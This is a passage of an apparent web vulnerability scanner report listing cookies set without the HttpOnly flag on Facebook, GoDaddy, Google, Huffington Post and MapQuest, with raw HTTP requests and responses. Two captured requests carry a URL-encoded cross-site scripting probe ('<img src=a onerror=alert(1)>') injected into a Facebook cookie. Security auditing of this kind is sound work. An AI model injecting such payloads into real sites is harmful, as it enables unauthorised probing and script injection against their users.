User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.79. https://www.facebook.com/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.80. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • lsd=Mkkns; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

11.81. https://www.facebook.com/pages/create.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.82. https://www.facebook.com/recover.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /recover.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • made_write_conn=1304595854; path=/; domain=.facebook.com
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
  • W=1304595854; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.83. https://www.godaddy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
  • currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
  • currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
  • traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
  • HPBackground=DanicaImageOne; path=/
  • HPBackground=DanicaImageOne; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

11.84. https://www.godaddy.com/domains/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
  • currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
  • currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
  • traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
  • BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

11.85. http://www.google.com/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 05 May 2011 10:57:55 GMT
Expires: Thu, 05 May 2011 10:57:55 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

11.86. http://www.huffingtonpost.com/include/geopromo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /include/geopromo.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • geocity=Dallas; expires=Thu, 05-May-2011 01:59:03 GMT; path=/; domain=.beta.huffingtonpost.com
  • geostate=Texas; expires=Thu, 05-May-2011 01:59:03 GMT; path=/; domain=.beta.huffingtonpost.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /include/geopromo.php HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.5.10.1304575105; s_pers=%20s_getnr%3D1304575139917-New%7C1367647139917%3B%20s_nrgvo%3DNew%7C1367647139919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 00:59:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 00:59:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: geocity=Dallas; expires=Thu, 05-May-2011 01:59:03 GMT; path=/; domain=.beta.huffingtonpost.com
Set-Cookie: geostate=Texas; expires=Thu, 05-May-2011 01:59:03 GMT; path=/; domain=.beta.huffingtonpost.com


11.87. http://www.huffingtonpost.com/users/logout/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /users/logout/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
  • huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /users/logout/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82719
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

11.88. http://www.mapquest.com/directions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /directions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:39 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directions HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; tsexpiry=1; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; t_Id=ZGVmYXVsdDpudWxs; c_Id=MjM5OjM5OQ%3D%3D;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:39 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 10:58:38 GMT
Content-Length: 33635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

11.89. http://www.mapquest.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:39 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; tsexpiry=1; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; t_Id=ZGVmYXVsdDpudWxs; c_Id=MjM5OjM5OQ%3D%3D;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:39 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 10:58:39 GMT
Content-Length: 32015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

11.90. http://www.mapquest.com/routeplanner

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /routeplanner

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
